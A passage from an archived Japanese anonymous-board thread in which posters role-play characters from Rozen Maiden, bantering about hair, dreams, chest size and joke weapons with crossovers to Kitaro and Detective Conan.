ジュンは、ハゲるかもしれねぇーですぅ
でも、翠星石はハゲないですよ

458 :翠星石:2006/12/28(木) 01:50:10
ドールの髪が伸びるのは聞いた事あるですが
抜けるって話は聞いた事ねーですぅ

459 :翠星石:2006/12/28(木) 01:59:42
翠星石の髪がドールの中で1番綺麗ですぅ

460 :翠星石:2006/12/28(木) 02:37:58
激しく同意ですぅ

461 :翠星石:2006/12/28(木) 02:46:25
真紅の髪くらいがちょうどいいと思うのだ・・・です

462 :JUM:2006/12/28(木) 06:22:01
>>461
何やってるんだ真紅?

463 :翠星石:2006/12/28(木) 08:56:03
これは酷いですぅ

464 :翠星石:2006/12/28(木) 09:23:12
そんなことより蒼星石とちゅっちゅするですぅ〜

465 :翠星石:2006/12/28(木) 09:24:45
蒼星石はもういないのですよ

466 :翠星石:2006/12/28(木) 12:56:00
蒼星石はみんなの心の中に生きているですぅ

467 :翠星石:2006/12/28(木) 13:51:43
蒼星石なら隣で寝息たててるぜですぅ

468 :翠星石:2006/12/28(木) 13:58:10
渋いですぅハードボイルドですぅ
それにしても雨風やまねえです


469 :蒼星石:2006/12/28(木) 14:22:00
僕はまだ生きてるよ!!
さあ翠星石…君が望むならちゅっちゅとやらするかい?

470 :翠星石:2006/12/28(木) 14:22:51
もちろんですぅ〜蒼星石ぃ〜

471 :翠星石:2006/12/28(木) 14:30:28
冬休みももうちょっとで終わりですね

472 :翠星石:2006/12/28(木) 15:08:40
見てらんねーです

473 :翠星石:2006/12/28(木) 16:41:21
冬休みは始まったばかりのはずですが

474 :翠星石:2006/12/28(木) 17:26:10
というか蒼星石とやり過ぎたのですぅ

475 :翠星石:2006/12/28(木) 17:28:16
と、いう夢を見たのです

476 :翠星石:2006/12/28(木) 17:39:43
さすが翠星石ですぅ
自分の欲望どおりの夢を見られるなんて、夢の庭師の名は伊達じゃねーですぅ

477 :翠星石:2006/12/28(木) 17:43:45
最近は悪夢しか見れないです

478 :翠星石:2006/12/28(木) 17:57:52
というと?

479 :翠星石:2006/12/28(木) 18:21:45
翠星石の胸が真紅のようにペタンコになる夢ですぅ・・・
今夜もあの夢を見るかと思うと怖くて眠れんですぅ・・・

480 :真紅:2006/12/28(木) 18:25:30
姉妹そろって私の胸をぺたんこ呼ばわりするのね
いいわ、かかってきなさい。二人まとめてその減らず口にお灸をそえてあげる


481 :翠星石:2006/12/28(木) 18:38:40
>>480
お灸はすえるもんですぅ。

482 :翠星石:2006/12/28(木) 18:46:41
雪が降ってきやがったですぅ
蒼星石とみるですぅ

483 :真紅:2006/12/28(木) 18:47:12
出鼻をくじかれるというのはまさにこのことね・・・

484 :水銀燈:2006/12/28(木) 18:52:06
アッヒャッヒャッヒャッヒャッ

485 :真紅:2006/12/28(木) 19:00:50
可哀相な水銀燈……心がジャンクになってしまったのね……

486 :翠星石:2006/12/28(木) 19:11:24
水銀燈と一番接点があるのは真紅ですぅ
直してやるがよいよです

487 :蒼星石:2006/12/28(木) 19:39:31
何故2女と5女しか時間をまきもどせないんだろうね

488 :翠星石:2006/12/28(木) 19:43:33
蒼星石、鋏だけじゃ不満ですか?
翠星石も如雨露だけじゃ不満だと思ってたところですぅ
ちょいとお父様及び松尾監督に問い合わせてくるです

489 :翠星石:2006/12/28(木) 20:00:41
蒼星石にはシルクハット飛ばしがあるですぅ
ようやくこれで人工精霊以外に遠距離攻撃を持たない蒼星石に遠距離攻撃の手段が追加されたですぅ
でも衣服を攻撃手段にするのはどうかと思ったですよ


490 :翠星石:2006/12/28(木) 20:02:55
衣服という言葉で鬼太郎を思い出したですぅ

491 :翠星石:2006/12/28(木) 20:05:15
い、いやらしい帽子ですぅ・・・あっ・・・らめぇ・・・

492 :翠星石:2006/12/28(木) 20:05:44
蒼星石のシルクハットは鬼太郎のチャンチャンコと同じように武器になるですぅ

493 :翠星石:2006/12/28(木) 20:06:27
>>491
どんなプレイを想像しているですか?

494 :翠星石:2006/12/28(木) 20:06:50
じゃあ翠星石のリボンも巻きついて絞め殺したりできるようになるのですね

495 :翠星石:2006/12/28(木) 20:09:28
もちろん靴はリモコン式ですぅ

496 :翠星石:2006/12/28(木) 20:11:12
目玉親父にはほら、翠星石のオッドアイを使えばいいですよ

497 :翠星石:2006/12/28(木) 20:14:38
>>489
ソー○スト○イクを連想したですよ

498 :翠星石:2006/12/28(木) 20:41:03
蒼星石=新一

499 :翠星石:2006/12/28(木) 20:43:53
バーローですぅ

500 :翠星石:2006/12/28(木) 20:46:19
ですぅ

66 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)